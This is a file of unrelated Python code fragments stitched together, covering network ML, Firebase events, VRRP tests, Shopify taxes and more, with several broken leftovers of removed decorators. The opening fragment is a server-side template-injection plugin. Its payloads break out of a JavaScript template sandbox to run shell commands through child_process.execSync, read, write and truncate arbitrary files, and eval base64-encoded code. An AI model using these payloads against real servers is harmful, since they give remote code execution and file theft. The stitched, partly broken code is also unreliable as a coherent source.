        self.update_actions({'render': {'render': '{{%(code)s}}', 'header': '{{%(header)s}}', 'trailer': '{{%(trailer)s}}', 'test_render': ('(%(n1)s,%(n2)s*%(n3)s)|dump' % {'n1': rand.randints[0], 'n2': rand.randints[1], 'n3': rand.randints[2]}), 'test_render_expected': ('%(res)s' % {'res': (rand.randints[1] * rand.randints[2])})}, 'write': {'call': 'inject', 'write': '{{range.constructor("global.process.mainModule.require(\'fs\').appendFileSync(\'%(path)s\', Buffer(\'%(chunk_b64)s\', \'base64\'), \'binary\')")()}}', 'truncate': '{{range.constructor("global.process.mainModule.require(\'fs\').writeFileSync(\'%(path)s\', \'\')")()}}'}, 'read': {'call': 'evaluate', 'read': "global.process.mainModule.require('fs').readFileSync('%(path)s').toString('base64')"}, 'md5': {'call': 'evaluate', 'md5': 'global.process.mainModule.require(\'crypto\').createHash(\'md5\').update(global.process.mainModule.require(\'fs\').readFileSync(\'%(path)s\')).digest("hex")'}, 'evaluate': {'call': 'render', 'evaluate': 'range.constructor("return eval(Buffer(\'%(code_b64)s\',\'base64\').toString())")()', 'test_os': "global.process.mainModule.require('os').platform()"}, 'execute': {'call': 'evaluate', 'execute': "global.process.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString())"}, 'execute_blind': {'call': 'inject', 'execute_blind': '{{range.constructor("global.process.mainModule.require(\'child_process\').execSync(Buffer(\'%(code_b64)s\', \'base64\').toString() + \' && sleep %(delay)i\')")()}}'}})
        # Injection contexts: level 0 plain text, level 1 expression/statement
        # breakouts, level 5 loop/set-block breakouts and comment escape.
        self.set_contexts([{'level': 0}, {'level': 1, 'prefix': '%(closure)s}}', 'suffix': '{{1', 'closures': javascript.ctx_closures}, {'level': 1, 'prefix': '%(closure)s %%}', 'suffix': '', 'closures': javascript.ctx_closures}, {'level': 5, 'prefix': '%(closure)s %%}{%% endfor %%}{%% for a in [1] %%}', 'suffix': '', 'closures': javascript.ctx_closures}, {'level': 5, 'prefix': '%(closure)s = 1 %%}', 'suffix': '', 'closures': javascript.ctx_closures}, {'level': 5, 'prefix': '#}', 'suffix': '{#'}])
def test_by_type_multi(events, ball1, ball2, ball3, cue):
    """filter_type with several event types returns all matching events, in order."""
    assert (filter_type(events, [EventType.STICK_BALL, EventType.SLIDING_ROLLING]) == [stick_ball_collision(cue, ball2, 1), sliding_rolling_transition(ball1, 2), sliding_rolling_transition(ball1, 4), sliding_rolling_transition(ball2, 5), sliding_rolling_transition(ball1, 8), sliding_rolling_transition(ball3, 9)])
def test_get_latest_component_id_from_prefix():
    """The component id whose prefix matches is returned from the agent's dependencies."""
    component_id = ComponentId(ComponentType.PROTOCOL, PublicId('author', 'name', '0.1.0'))
    agent_config = MagicMock()
    agent_config.package_dependencies = {component_id}
    assert get_latest_component_id_from_prefix(agent_config, component_id.component_prefix) == component_id
def test_if_revoked_then_permission_denied(rf: RequestFactory) -> None:
    """A revoked API key must be rejected with HTTP 403."""
    _, key = APIKey.objects.create_key(name='test', revoked=True)
    request = rf.get('/test/', HTTP_AUTHORIZATION=f'Api-Key {key}')
    assert view(request).status_code == 403
class NetworkML():
    """Pipeline driver chaining the parser, featurizer and algorithm stages.

    Constructing an instance parses CLI arguments, configures logging and
    immediately runs the configured stage range (``self.main()`` is called
    as a side effect of ``__init__``).
    """

    def __init__(self, raw_args=None):
        """Parse arguments, copy them onto the instance and run the pipeline.

        Args:
            raw_args: optional list of CLI tokens; ``None`` lets argparse
                read ``sys.argv``.
        """
        self.logger = logging.getLogger(__name__)
        # Maps the --verbose choices onto logging module levels.
        log_levels = {'INFO': logging.INFO, 'DEBUG': logging.DEBUG, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR}
        # Optional per-stage arguments. This one table drives both CLI
        # registration (parse_args) and forwarding to the stage runners
        # (add_opt_args).
        self.stage_args = {'parser': {}, 'featurizer': {'srcmacid': {'help': 'attempt to detect canonical source MAC and featurize only that MAC', 'action': 'store_true'}, 'no-srcmacid': {'help': 'featurize all MACs', 'action': 'store_true'}}, 'algorithm': {'trained_model': {'help': 'specify a path to load or save trained model'}, 'label_encoder': {'help': 'specify a path to load or save label encoder'}, 'scaler': {'help': 'specify a path to load or save scaler'}, 'kfolds': {'help': 'specify number of folds for k-fold cross validation'}, 'eval_data': {'help': 'path to eval CSV file, if training'}, 'train_unknown': {'help': 'Train on unknown roles'}, 'list': {'choices': ['features'], 'default': None, 'help': 'list information contained within model defined by --trained_model'}}}
        parsed_args = self.parse_args(raw_args=raw_args)
        self.in_path = parsed_args.path
        self.algorithm = parsed_args.algorithm
        self.engine = parsed_args.engine
        self.first_stage = parsed_args.first_stage
        self.final_stage = parsed_args.final_stage
        self.groups = parsed_args.groups
        self.gzip_opt = parsed_args.gzip
        self.level = parsed_args.level
        self.operation = parsed_args.operation
        self.output = parsed_args.output
        self.threads = parsed_args.threads
        self.list = parsed_args.list
        self.log_level = parsed_args.verbose
        # Copy any stage-specific options the user actually supplied onto
        # the instance (None means "not given"; keep whatever default).
        for args in self.stage_args.values():
            for arg in args:
                val = getattr(parsed_args, arg, None)
                if (val is not None):
                    setattr(self, arg, val)
        logging.basicConfig(level=log_levels[self.log_level])
        # NOTE: the whole pipeline runs from the constructor.
        self.main()

    def parse_args(self, raw_args=None):
        """Build the argument parser (core options + per-stage options) and parse.

        Args:
            raw_args: optional token list passed through to argparse.

        Returns:
            The parsed argparse Namespace.
        """
        parser = argparse.ArgumentParser(description=('networkml %s' % __version__))
        parser.add_argument('path', help='path to a single pcap file, or a directory of pcaps to parse', default='/pcaps')
        parser.add_argument('--algorithm', '-a', choices=['host_footprint'], default='host_footprint', help='choose which algorithm to use (default=host_footprint)')
        parser.add_argument('--engine', '-e', choices=['pyshark', 'tshark', 'host'], default='tshark', help='engine to use to process the PCAP file (default=tshark)')
        parser.add_argument('--first_stage', '-f', choices=['parser', 'featurizer', 'algorithm'], default='parser', help='choose which stage to start at, `path` arg is relative to stage (default=parser)')
        parser.add_argument('--final_stage', choices=['parser', 'featurizer', 'algorithm'], default='algorithm', help='choose which stage to finish at (default=algorithm)')
        parser.add_argument('--groups', '-g', default='host', help='groups of comma separated features to use (default=host)')
        parser.add_argument('--gzip', '-z', choices=['input', 'output', 'both'], default='both', help='use gzip between stages, useful when not using all 3 stages (default=both)')
        parser.add_argument('--level', '-l', choices=['packet', 'flow', 'host'], default='packet', help='level to make the output records (default=packet)')
        parser.add_argument('--operation', '-O', choices=['train', 'predict', 'eval'], default='predict', help='choose which operation task to perform, train or predict (default=predict)')
        parser.add_argument('--output', '-o', default=None, help='directory to write out any results files to')
        parser.add_argument('--threads', '-t', default=1, type=int, help='number of async threads to use (default=1)')
        parser.add_argument('--verbose', '-v', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'], default='INFO', help='logging level (default=INFO)')
        # Register the optional per-stage flags declared in self.stage_args.
        for (stage, args) in self.stage_args.items():
            for (arg, arg_parms) in args.items():
                arg_help = ('%s (%s)' % (arg_parms['help'], stage))
                arg_choices = (arg_parms['choices'] if ('choices' in arg_parms) else None)
                arg_default = (arg_parms['default'] if ('default' in arg_parms) else None)
                action = arg_parms.get('action', 'store')
                if (not arg_choices):
                    parser.add_argument(('--' + arg), action=action, help=arg_help, default=arg_default, dest=arg)
                else:
                    parser.add_argument(('--' + arg), help=arg_help, choices=arg_choices, default=arg_default, dest=arg, action=action)
        parsed_args = parser.parse_args(raw_args)
        return parsed_args

    def add_opt_args(self, opt_args):
        """Serialize supplied per-stage options back into CLI token form.

        Args:
            opt_args: one stage's arg-spec dict from ``self.stage_args``.

        Returns:
            List of CLI tokens (e.g. ``['--trained_model', 'path']``); flags
            declared ``store_true`` contribute only the flag itself.
        """
        raw_args = []
        for (arg, arg_parms) in opt_args.items():
            val = getattr(self, arg, None)
            if (val is not None):
                raw_args.append(('--' + arg))
                if (arg_parms.get('action', None) != 'store_true'):
                    raw_args.append(str(val))
        return raw_args

    def run_parser_stage(self, in_path):
        """Run the pcap-to-CSV parser stage on *in_path*; return its output path/result."""
        raw_args = self.add_opt_args(self.stage_args['parser'])
        raw_args.extend(['-e', self.engine, '-l', self.level, '-o', self.output, '-t', str(self.threads), '-v', self.log_level, in_path])
        instance = PCAPToCSV(raw_args=raw_args)
        return instance.main()

    def run_featurizer_stage(self, in_path):
        """Run the CSV-to-features stage on *in_path*; return its output path/result."""
        raw_args = self.add_opt_args(self.stage_args['featurizer'])
        raw_args.extend(['-c', '-g', self.groups, '-z', self.gzip_opt, '-o', self.output, '-t', str(self.threads), '-v', self.log_level, in_path])
        instance = CSVToFeatures(raw_args=raw_args)
        return instance.main()

    def run_algorithm_stage(self, in_path):
        """Run the ML algorithm stage (train/predict/eval) on *in_path*."""
        raw_args = self.add_opt_args(self.stage_args['algorithm'])
        raw_args.extend(['-O', self.operation, '-v', self.log_level, in_path])
        instance = HostFootprint(raw_args=raw_args)
        return instance.main()

    def output_results(self, result_json_str, run_complete):
        """Emit results after a pipeline run.

        Prints the result when --list was requested, and writes prediction
        results to ``<output>/predict.json`` when the final stage was the
        algorithm in predict mode and an output directory exists.

        Args:
            result_json_str: output of the last stage that ran.
            run_complete: True only if every scheduled stage finished.
        """
        if run_complete:
            if self.list:
                print(f'{result_json_str}')
            if ((self.final_stage == 'algorithm') and (self.operation == 'predict')):
                if (self.output and os.path.isdir(self.output)):
                    # 'id' and 'file_path' env vars come from the calling
                    # environment (container orchestration) when present.
                    uid = os.getenv('id', 'None')
                    file_path = os.getenv('file_path', self.in_path)
                    results_outputter = ResultsOutput(self.logger, uid, file_path)
                    result_json_file_name = os.path.join(self.output, 'predict.json')
                    results_outputter.output_from_result_json(result_json_str, result_json_file_name)

    def run_stages(self):
        """Run the contiguous range of stages from first_stage to final_stage.

        Each stage's result is fed as the input path of the next stage;
        failures are logged and results (possibly partial) are still output.
        """
        stages = ('parser', 'featurizer', 'algorithm')
        stage_runners = {'parser': self.run_parser_stage, 'featurizer': self.run_featurizer_stage, 'algorithm': self.run_algorithm_stage}
        try:
            first_stage_index = stages.index(self.first_stage)
            final_stage_index = stages.index(self.final_stage)
        except ValueError:
            self.logger.error('Unknown first/final stage name')
            return
        if (first_stage_index > final_stage_index):
            self.logger.error('Invalid first and final stage combination')
            return
        run_schedule = stages[first_stage_index:(final_stage_index + 1)]
        # The initial "result" is the user-supplied input path.
        result = self.in_path
        self.logger.info(f'running stages: {run_schedule}')
        run_complete = False
        try:
            for stage in run_schedule:
                runner = stage_runners[stage]
                result = runner(result)
            run_complete = True
        except Exception as err:
            self.logger.error(f'Could not run stage: {err}')
        self.output_results(result, run_complete)

    def main(self):
        """Entry point: execute the scheduled pipeline stages."""
        self.run_stages()
def event_from_ce_helper(raw: _ce.CloudEvent, cls, app_id=True):
    """Build a typed Firebase Alerts event object from a raw CloudEvent.

    Merges the CloudEvent's data payload and context attributes into one
    dict, extracts the alert-specific fields, and constructs *cls* from them.

    Args:
        raw: the incoming CloudEvent.
        cls: event class to instantiate with the extracted keyword args.
        app_id: when True, also forward the optional ``appid`` attribute
            as ``app_id``.

    Returns:
        An instance of *cls* populated from the CloudEvent.
    """
    event_attributes = raw._get_attributes()
    event_data: _typing.Any = raw.get_data()
    # Context attributes win over data keys on collision.
    event_dict = {**event_data, **event_attributes}
    alert_type: str = event_dict['alerttype']
    event_kwargs = {
        'alert_type': alert_type,
        'data': firebase_alert_data_from_ce(event_dict),
        'id': event_dict['id'],
        'source': event_dict['source'],
        'specversion': event_dict['specversion'],
        # 'subject' is optional on CloudEvents; default to None when absent
        # (idiom fix: dict.get replaces the `x if k in d else None` form).
        'subject': event_dict.get('subject'),
        'time': _util.timestamp_conversion(event_dict['time']),
        'type': event_dict['type'],
    }
    if app_id:
        event_kwargs['app_id'] = event_dict.get('appid')
    return cls(**event_kwargs)
def generate_adhoc_ssl_pair(cn=None):
    """Generate a throwaway self-signed certificate and private key.

    Intended for ad-hoc development HTTPS only — the certificate is
    deliberately untrusted ("Dummy Certificate" / "Untrusted Authority").

    Args:
        cn: common name for the certificate subject; defaults to '*'.

    Returns:
        Tuple ``(cert, pkey)`` of pyOpenSSL X509 and PKey objects.
    """
    from random import random
    crypto = _get_openssl_crypto_module()
    if (cn is None):
        cn = '*'
    cert = crypto.X509()
    # Serial number only needs to be unique-ish for an ad-hoc cert;
    # `random` is not a CSPRNG — acceptable here solely because the cert
    # is explicitly a dummy. Do not reuse this pattern for real certs.
    cert.set_serial_number(int((random() * sys.maxsize)))
    cert.gmtime_adj_notBefore(0)
    # Valid for one year (60s * 60m * 24h * 365d) from now.
    cert.gmtime_adj_notAfter((((60 * 60) * 24) * 365))
    subject = cert.get_subject()
    subject.CN = cn
    subject.O = 'Dummy Certificate'
    issuer = cert.get_issuer()
    issuer.CN = 'Untrusted Authority'
    issuer.O = 'Self-Signed'
    pkey = crypto.PKey()
    # SECURITY: 1024-bit RSA and an MD5 signature are far below modern
    # standards — fine for a local dummy cert, never for production use.
    pkey.generate_key(crypto.TYPE_RSA, 1024)
    cert.set_pubkey(pkey)
    cert.sign(pkey, 'md5')
    return (cert, pkey)
class Fileheader(BasicObject):
    """Representation of a file-header logical object.

    Exposes the header's sequence number and identifier, both read from the
    underlying attribute store via ``__getitem__``.
    """
    # Attribute parsers for the raw object's labels.
    attributes = {'SEQUENCE-NUMBER': utils.scalar, 'ID': utils.scalar}

    def __init__(self, attic, lf):
        super().__init__(attic, lf=lf)

    def sequencenr(self):
        # Position of this file within the storage set.
        return self['SEQUENCE-NUMBER']

    def id(self):
        # Human-readable description/identifier of the file.
        return self['ID']

    def describe_attr(self, buf, width, indent, exclude):
        """Write this object's attributes into *buf* for describe() output."""
        d = OrderedDict()
        # NOTE(review): self.id / self.sequencenr are referenced WITHOUT
        # calling them — these accessors are presumably decorated with
        # @property in the original (decorators appear stripped from this
        # file); confirm against the upstream source.
        d['Description'] = self.id
        d['Position in storage set'] = self.sequencenr
        utils.describe_dict(buf, d, width, indent, exclude)
class BinomialLogitTest(unittest.TestCase):
    """Graph-accumulation tests for Binomial models with logit-space probabilities."""

    def test_constant_binomial_logit_graph(self) -> None:
        """A constant logit of 0 compiles to Binomial(100, 0.) with two samples summed."""
        observations = {}
        queries_observed = [add()]
        graph_observed = BMGInference().to_dot(queries_observed, observations)
        # Expected DOT rendering; compared whitespace-stripped below.
        graph_expected = '\ndigraph "graph" {\n  N0[label=100];\n  N1[label=0.];\n  N2[label=Binomial];\n  N3[label=Sample];\n  N4[label=Sample];\n  N5[label=ToPosReal];\n  N6[label=ToPosReal];\n  N7[label="+"];\n  N8[label=Query];\n  N0 -> N2;\n  N1 -> N2;\n  N2 -> N3;\n  N2 -> N4;\n  N3 -> N5;\n  N4 -> N6;\n  N5 -> N7;\n  N6 -> N7;\n  N7 -> N8;\n}\n'
        self.assertEqual(graph_observed.strip(), graph_expected.strip())

    def test_binomial_normal_logit_graph(self) -> None:
        """A Normal-distributed logit compiles through a Logistic node into Binomial."""
        observations = {}
        queries_observed = [binomial_normal_logit()]
        graph_observed = BMGInference().to_dot(queries_observed, observations)
        # Expected DOT rendering; compared whitespace-stripped below.
        graph_expected = '\ndigraph "graph" {\n  N0[label=0.0];\n  N1[label=1.0];\n  N2[label=Normal];\n  N3[label=Sample];\n  N4[label=100];\n  N5[label=Logistic];\n  N6[label=Binomial];\n  N7[label=Sample];\n  N8[label=Query];\n  N0 -> N2;\n  N1 -> N2;\n  N2 -> N3;\n  N3 -> N5;\n  N4 -> N6;\n  N5 -> N6;\n  N6 -> N7;\n  N7 -> N8;\n}\n'
        self.assertEqual(graph_observed.strip(), graph_expected.strip())
def test_dont_use_wrapper_location():
    """Task names must reference the usage module, not the decorator's source module."""
    module = importlib.import_module('tests.flytekit.unit.core.flyte_functools.decorator_usage')
    task = getattr(module, 'get_data')
    assert 'decorator_source' not in task.name
    assert 'decorator_usage' in task.name
    full_name, mod_name, attr_name, _ = extract_task_module(task)
    assert full_name == 'tests.flytekit.unit.core.flyte_functools.decorator_usage.get_data'
    assert mod_name == 'tests.flytekit.unit.core.flyte_functools.decorator_usage'
    assert attr_name == 'get_data'
def main():
    """Compile every .ui file in ui_files/ for PyQt4, PySide and PySide2.

    For each .ui file, the framework-specific .py output is (re)generated
    when it is missing or the .ui source changed (tracked via an MD5 file).
    A RuntimeError from a compiler (e.g. framework not installed) is
    tolerated so the remaining frameworks are still attempted.

    Refactor: the three duplicated per-framework compile branches are folded
    into one loop; printed output is unchanged.
    """
    manager = CompilerManager()
    # Framework name -> compiler; dict preserves insertion order (3.7+),
    # keeping the compile attempts in the original PyQt4/PySide/PySide2 order.
    compilers = {name: manager.find_compiler(name) for name in ('PyQt4', 'PySide', 'PySide2')}
    path = os.path.dirname(__file__)
    ui_path = os.path.join(path, 'ui_files')
    output_path = os.path.join(path, 'ui_compiled')
    ui_files = [UIFile(os.path.join(ui_path, name)) for name in glob.glob1(ui_path, '*.ui')]
    for ui_file in ui_files:
        print('')
        print(('ui_file: %s' % ui_file.filename))
        assert isinstance(ui_file, UIFile)
        py_files = {name: compiler.get_py_file(ui_file, output_path) for (name, compiler) in compilers.items()}
        print(('ui_file.is_new() : %s' % ui_file.is_new()))
        print(('py_file_pyqt4.exists() : %s' % py_files['PyQt4'].exists()))
        print(('py_file_pyside.exists() : %s' % py_files['PySide'].exists()))
        print(('py_file_pyside2.exists(): %s' % py_files['PySide2'].exists()))
        renew_md5 = False
        for (name, compiler) in compilers.items():
            if ui_file.is_new() or not py_files[name].exists():
                print('re-compiling %s version' % name)
                renew_md5 = True
                try:
                    compiler.compile(ui_file, output_path)
                except RuntimeError:
                    # Framework/toolchain missing: skip and try the others.
                    pass
        if renew_md5:
            print('Renewing the MD5 file!')
            ui_file.update_md5_file()
    # assumes the final message belongs outside the per-file loop (flattened
    # source is ambiguous) — TODO confirm against the original file.
    print('Finished compiling')
class Test_vrrpv3_ipv6(unittest.TestCase):
    """Unit tests for VRRPv3 packets carried over IPv6.

    A reference packet is built once at class-definition time both via the
    library API (``vrrpv3``) and by hand with struct (``buf``), and the two
    representations are cross-checked by the individual tests.
    """
    # Fixture field values shared by all tests.
    version = vrrp.VRRP_VERSION_V3
    type_ = vrrp.VRRP_TYPE_ADVERTISEMENT
    vrid = 128
    priority = 99
    count_ip = 1
    max_adver_int = 111
    checksum = 0
    ip_address = '2001:db8:2000::1'
    # API-built packet object.
    vrrpv3 = vrrp.vrrpv3.create(type_, vrid, priority, max_adver_int, [ip_address])
    # Hand-packed wire image: fixed header fields + one 16-byte IPv6 address.
    buf = struct.pack((vrrp.vrrpv3._PACK_STR + '16s'), vrrp.vrrp_to_version_type(vrrp.VRRP_VERSION_V3, type_), vrid, priority, count_ip, max_adver_int, checksum, addrconv.ipv6.text_to_bin(ip_address))

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_init(self):
        """Fields passed to create() are stored unchanged."""
        eq_(self.type_, self.vrrpv3.type)
        eq_(self.vrid, self.vrrpv3.vrid)
        eq_(self.priority, self.vrrpv3.priority)
        eq_(self.count_ip, self.vrrpv3.count_ip)
        eq_(1, len(self.vrrpv3.ip_addresses))
        eq_(self.ip_address, self.vrrpv3.ip_addresses[0])

    def test_parser(self):
        """Parsing the hand-packed buffer reproduces every fixture field."""
        (vrrpv3, _cls, _) = self.vrrpv3.parser(self.buf)
        eq_(self.version, vrrpv3.version)
        eq_(self.type_, vrrpv3.type)
        eq_(self.vrid, vrrpv3.vrid)
        eq_(self.priority, vrrpv3.priority)
        eq_(self.count_ip, vrrpv3.count_ip)
        eq_(self.max_adver_int, vrrpv3.max_adver_int)
        eq_(self.checksum, vrrpv3.checksum)
        eq_(1, len(vrrpv3.ip_addresses))
        # Addresses come back as text, not binary.
        eq_(str, type(vrrpv3.ip_addresses[0]))
        eq_(self.ip_address, vrrpv3.ip_addresses[0])

    def test_serialize(self):
        """Serialization emits correct fields and a checksum that verifies to 0."""
        src_ip = '2001:db8:2000::1'
        dst_ip = vrrp.VRRP_IPV6_DST_ADDRESS
        # Preceding IPv6 header; needed for the pseudo-header checksum.
        prev = ipv6.ipv6(6, 0, 0, 0, inet.IPPROTO_VRRP, vrrp.VRRP_IPV6_HOP_LIMIT, src_ip, dst_ip)
        type_ = vrrp.VRRP_TYPE_ADVERTISEMENT
        vrid = 5
        priority = 10
        max_adver_int = 30
        ip_address = '2001:db8:2000::2'
        ip_addresses = [ip_address]
        vrrp_ = vrrp.vrrpv3.create(type_, vrid, priority, max_adver_int, ip_addresses)
        buf = vrrp_.serialize(bytearray(), prev)
        print(len(buf), type(buf), buf)
        pack_str = (vrrp.vrrpv3._PACK_STR + '16s')
        pack_len = struct.calcsize(pack_str)
        res = struct.unpack(pack_str, six.binary_type(buf))
        eq_(res[0], vrrp.vrrp_to_version_type(vrrp.VRRP_VERSION_V3, type_))
        eq_(res[1], vrid)
        eq_(res[2], priority)
        eq_(res[3], len(ip_addresses))
        eq_(res[4], max_adver_int)
        eq_(res[6], addrconv.ipv6.text_to_bin(ip_address))
        eq_(len(buf), pack_len)
        print(res)
        # IPv6 pseudo-header: src, dst, upper-layer length, next header.
        ph = struct.pack('!16s16sI3xB', addrconv.ipv6.text_to_bin(src_ip), addrconv.ipv6.text_to_bin(dst_ip), pack_len, inet.IPPROTO_VRRP)
        # A correct embedded checksum makes the overall sum verify to zero.
        s = packet_utils.checksum((ph + buf))
        eq_(0, s)

    # NOTE(review): the bare tuple expression below is almost certainly the
    # remnant of a stripped ``@raises(Exception)`` decorator for the
    # following test — confirm against the original file.
    (Exception)

    def test_malformed_vrrpv3(self):
        """Parsing a truncated buffer is expected to raise (see note above)."""
        m_short_buf = self.buf[1:vrrp.vrrpv3._MIN_LEN]
        vrrp.vrrp.parser(m_short_buf)

    def test_create_packet(self):
        """A created packet survives a serialize/parse/serialize round trip."""
        primary_ip = '2001:db8:2000::3'
        p0 = self.vrrpv3.create_packet(primary_ip)
        p0.serialize()
        print(len(p0.data), p0.data)
        p1 = packet.Packet(six.binary_type(p0.data))
        p1.serialize()
        print(len(p0.data), p0.data)
        print(len(p1.data), p1.data)
        eq_(p0.data, p1.data)

    def test_to_string(self):
        """str()/repr() list every public field as key=value pairs."""
        vrrpv3_values = {'version': self.version, 'type': self.type_, 'vrid': self.vrid, 'priority': self.priority, 'count_ip': self.count_ip, 'max_adver_int': self.max_adver_int, 'checksum': self.vrrpv3.checksum, 'ip_addresses': [self.ip_address], 'auth_type': None, 'auth_data': None, 'identification': self.vrrpv3.identification}
        _vrrpv3_str = ','.join([('%s=%s' % (k, repr(vrrpv3_values[k]))) for (k, v) in inspect.getmembers(self.vrrpv3) if (k in vrrpv3_values)])
        vrrpv3_str = ('%s(%s)' % (vrrp.vrrpv3.__name__, _vrrpv3_str))
        eq_(str(self.vrrpv3), vrrpv3_str)
        eq_(repr(self.vrrpv3), vrrpv3_str)
def get_tax_account_head(tax, charge_type: Optional[Literal[('shipping', 'sales_tax')]]=None):
    """Resolve the ERPNext tax account head for a Shopify tax/charge line.

    Lookup order: an explicit per-tax mapping in 'Shopify Tax Account', then
    the settings-level default for *charge_type*. Throws when neither yields
    an account.
    """
    title = str(tax.get('title'))
    # Explicit per-tax mapping configured in the Shopify settings child table.
    account = frappe.db.get_value(
        'Shopify Tax Account',
        {'parent': SETTING_DOCTYPE, 'shopify_tax': title},
        'tax_account',
    )
    if not account and charge_type:
        # Fall back to the default account configured for this charge type.
        account = frappe.db.get_single_value(SETTING_DOCTYPE, DEFAULT_TAX_FIELDS[charge_type])
    if not account:
        frappe.throw(_('Tax Account not specified for Shopify Tax {0}').format(tax.get('title')))
    return account
class OptionSeriesScatter3dSonificationTracksMappingRate(Options):
    """Options wrapper for a sonification track's ``rate`` mapping.

    NOTE(review): each option below appears as TWO ``def``s with the same
    name (getter-like then setter-like). As written, the second definition
    shadows the first; these pairs are presumably decorated with
    ``@property`` / ``@<name>.setter`` in the generated original (decorators
    appear stripped from this file) — confirm before relying on the getters.
    """

    def mapFunction(self):
        # Getter: mapping function applied to the value (default None).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter for mapFunction.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: data point property to map from (default None).
        return self._config_get(None)

    def mapTo(self, text: str):
        # Setter for mapTo.
        self._config(text, js_type=False)

    def max(self):
        # Getter: upper bound of the mapped output range (default None).
        return self._config_get(None)

    def max(self, num: float):
        # Setter for max.
        self._config(num, js_type=False)

    def min(self):
        # Getter: lower bound of the mapped output range (default None).
        return self._config_get(None)

    def min(self, num: float):
        # Setter for min.
        self._config(num, js_type=False)

    def within(self):
        # Getter: context the mapping is computed within (default None).
        return self._config_get(None)

    def within(self, value: Any):
        # Setter for within.
        self._config(value, js_type=False)
def start_notification(fledge_url, add_service, add_notification_instance, wait_time, retries):
    """Install the notification service and register a DataAvailability instance.

    Installs the 'notification' service as a package, waits for it to come
    up, then creates a retriggered notification named 'test #1' and verifies
    it is listed by the notification API.
    """
    add_service(fledge_url, 'notification', None, retries,
                installation_type='package', service_name=NOTIF_SERVICE_NAME)
    # Give the freshly installed service time to start before verifying.
    time.sleep(wait_time)
    verify_service_added(fledge_url, NOTIF_SERVICE_NAME)
    add_notification_instance(
        fledge_url, 'asset', None,
        rule_config={'auditCode': 'CONAD,SCHAD'},
        delivery_config={'enable': 'true'},
        rule_plugin='DataAvailability',
        installation_type='package',
        notification_type='retriggered',
        notification_instance_name='test #1',
        retrigger_time=5,
    )
    response = utils.get_request(fledge_url, '/fledge/notification')
    assert 'test #1' in [entry['name'] for entry in response['notifications']]
class MixupUtil():
    """Mixup data augmentation helper.

    Draws a single mixing coefficient ``lam`` and a random within-batch
    permutation at construction time, then mixes inputs/targets and computes
    the mixup loss with them.
    """

    @staticmethod
    def _get_lambda(alpha: float = 1.0) -> float:
        """Draw the mixing coefficient lambda ~ Beta(alpha, alpha).

        Fix: declared as a @staticmethod — it takes no ``self`` but is
        called as ``self._get_lambda()`` in ``__init__``, which would have
        passed the instance as *alpha*.

        Args:
            alpha: Beta distribution concentration; non-positive values
                disable mixing (lambda = 1.0, i.e. keep the original sample).
        """
        if alpha > 0.0:
            lam = np.random.beta(alpha, alpha)
        else:
            lam = 1.0
        return lam

    def __init__(self, batch_size: int) -> None:
        """Sample the permutation and mixing coefficient for one batch."""
        # Random pairing of samples within the batch.
        self.indices: torch.Tensor = torch.randperm(batch_size)
        self.lam: float = self._get_lambda()

    def mixup(self, x: torch.Tensor) -> torch.Tensor:
        """Return the convex combination of each sample with its paired partner."""
        return ((x * self.lam) + (x[self.indices] * (1 - self.lam)))

    def compute_loss(self, criterion: torch.nn.Module, pred: torch.Tensor, original_target: torch.Tensor, mixed_target: torch.Tensor) -> float:
        """Mixup loss: lam-weighted sum of losses against both target sets."""
        return ((self.lam * criterion(pred, original_target)) + ((1 - self.lam) * criterion(pred, mixed_target)))

    def mixup_labels(self, x: torch.Tensor) -> torch.Tensor:
        """Return the targets reordered by the batch permutation (the 'mixed' targets)."""
        return x[self.indices]
def extract2GuyztranslationWordpressCom(item):
    """Build a release message for '2Guyztranslation' feed items.

    Returns None for items without a chapter/volume or marked as previews,
    a release message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # (tag to look for, series name, translation type)
    for tag, series_name, tl_type in (('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')):
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, series_name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
.lbfgs
# ^ NOTE(review): stray fragment — most likely the tail of a stripped
# decorator line (e.g. a pytest marker selecting the lbfgs optimizer);
# confirm against the original file. Left untouched.
def test_lbfgs_neb():
    """Run an LBFGS-driven NEB optimization on the A->B test geometries."""
    kwargs = copy.copy(KWARGS)
    kwargs['images'] = 3
    kwargs['fix_ends'] = True
    k_min = 1000
    # Spring constants: band stiffness varies between k_min and k_max.
    k_max = (k_min + 10)
    neb = NEB(get_geoms(('A', 'B')), k_min=k_min, k_max=k_max, fix_ends=True)
    # NOTE(review): this import is unused in the function body.
    from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
    opt = run_cos_opt(neb, LBFGS, **kwargs)
    return opt
def _build_url(request, obj_or_url):
    """Return an absolute URL for a model instance or a raw URL string.

    Model instances resolve through get_absolute_url(); when django-bitly is
    enabled, a bitly short URL is preferred if bitlify returned a valid one.
    None yields the empty string.
    """
    if obj_or_url is None:
        return ''
    if not isinstance(obj_or_url, Model):
        # Plain URL/path: just make it absolute.
        return request.build_absolute_uri(obj_or_url)
    if not DJANGO_BITLY:
        return request.build_absolute_uri(obj_or_url.get_absolute_url())
    short_url = bitlify(obj_or_url)
    if BITLY_REGEX.match(short_url):
        return short_url
    # bitlify did not produce a bitly URL; fall back to the absolute URL.
    return request.build_absolute_uri(obj_or_url.get_absolute_url())
class ScheduleBEfile(BasicRawItemized if False else BaseRawItemized):
    """Raw electronic-filing Schedule B (itemized disbursement) line items.

    Read-only model over the ``real_efile_sb4`` table; each row is one
    itemized disbursement from an electronically filed report.
    """
    __tablename__ = 'real_efile_sb4'
    line_number = db.Column('line_num', db.String)
    # Composite primary key: e-filing report id + the related line number
    # of this item within the report.
    file_number = db.Column('repid', db.Integer, index=True, primary_key=True)
    related_line_number = db.Column('rel_lineno', db.Integer, primary_key=True)
    committee_id = db.Column('comid', db.String, doc=docs.COMMITTEE_ID)
    # Recipient identity and address fields.
    recipient_name = db.Column('lname', db.String)
    recipient_city = db.Column('city', db.String)
    recipient_state = db.Column('state', db.String)
    recipient_zip = db.Column('zip', db.String)
    recipient_prefix = db.Column('prefix', db.String)
